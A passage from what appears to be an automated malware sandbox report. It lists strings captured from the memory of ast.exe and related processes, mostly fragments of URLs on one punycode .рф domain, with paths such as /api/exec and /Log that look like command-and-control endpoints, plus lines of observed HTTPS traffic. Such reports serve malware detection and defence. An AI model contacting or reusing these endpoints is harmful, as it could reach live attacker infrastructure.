                          Source: ast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074037085.0000000005D76000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3030679576.0000000005D7E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3222862221.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3361561204.0000000005D18000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3344815019.0000000003023000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103917817.0000000005D34000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...
                          Source: ast.exe, 0000000A.00000002.3344815019.0000000003023000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...43
                          Source: ast.exe, 0000000A.00000002.3344815019.0000000003023000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...43aU
                          Source: ast.exe, 0000000A.00000002.3344815019.0000000003023000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...AW
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/
                          Source: ast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/AstClnog
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/ING=Defaui
                          Source: ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/Log
                          Source: ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3030679576.0000000005D7E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D67000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178152497.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D64000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
                          Source: ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44300
                          Source: ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44302
                          Source: ast.exe, 0000000A.00000002.3344815019.000000000302B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335
                          Source: ast.exe, 0000000A.00000002.3348750365.0000000003382000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3018890151.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335-
                          Source: ast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3348750365.000000000337B000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3018890151.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3019905898.0000000005D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335...
                          Source: ast.exe, 0000000A.00000002.3348750365.000000000337B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335......
                          Source: ast.exe, 0000000A.00000003.3018890151.0000000005DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335/
                          Source: ast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335/api/exec
                          Source: ast.exe, 0000000A.00000003.3018890151.0000000005DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335/templatep
                          Source: ast.exe, 0000000A.00000002.3344815019.000000000302B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335i:443y
                          Source: ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44359
                          Source: ast.exe, 0000000A.00000003.3275116176.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097543299.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087531277.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141777377.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196760907.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074429948.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224217384.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4438
                          Source: ast.exe, 0000000A.00000003.3275116176.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4439
                          Source: ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44396
                          Source: ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443:V
                          Source: ast.exe, 0000000A.00000002.3356437009.0000000004418000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443AUB
                          Source: ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443CBOs
                          Source: ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097910899.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087444966.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074037085.0000000005D76000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178707233.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081842391.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3363176686.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3338883178.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443JV
                          Source: ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443K
                          Source: ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097910899.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443NUGx
                          Source: ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443OW
                          Source: ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443Os
                          Source: ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443U
                          Source: ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443VV
                          Source: ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443VW~x
                          Source: ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443_Vpy
                          Source: ast.exe, 0000000A.00000003.3275116176.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097543299.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087531277.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141777377.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196760907.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074429948.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443f
                          Source: ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3361561204.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3342382296.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g
                          Source: ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g8P
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g~
                          Source: ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443h
                          Source: ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443i
                          Source: ast.exe, 0000000A.00000003.3030679576.0000000005D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443iVfy
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103917817.0000000005D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443k
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443l~
                          Source: ast.exe, 0000000A.00000003.3103307205.0000000005D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443mUbx
                          Source: ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443n
                          Source: ast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443rV
                          Source: ast.exe, 0000000A.00000003.3103917817.0000000005D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443t
                          Source: ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443ts
                          Source: ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443uV
                          Source: ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443uin
                          Source: ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443vU
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443w
                          Source: ast.exe, 0000000A.00000003.3020160381.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiCY
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3276265728.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiIZ
                          Source: ast.exe, 0000000A.00000003.3224328789.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3276265728.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiVZ
                          Source: ast.exe, 0000000A.00000002.3344815019.0000000003064000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aid003
                          Source: ast.exe, 0000000A.00000003.3124114421.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aihY
                          Source: ast.exe, 0000000A.00000002.3344815019.0000000003032000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aii
                          Source: ast.exe, 0000000A.00000003.2783362504.0000000000E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aij
                          Source: ast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiv
                          Source: ast.exe, 0000000A.00000003.3318115880.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0ar
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: https://sectigo.com/CPS0
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0B
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0C
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: https://sectigo.com/CPS0D
                          Source: ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0D
                          Source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032A2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368385814.000000006BBD2000.00000002.00000001.01000000.00000012.sdmp, ast.exe, 0000000A.00000002.3374557553.000000006BE40000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.drString found in binary or memory: https://www.openssl.org/H
                          Source: xcopy.exe, 00000008.00000003.2449507358.0000000003272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/faq.html
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
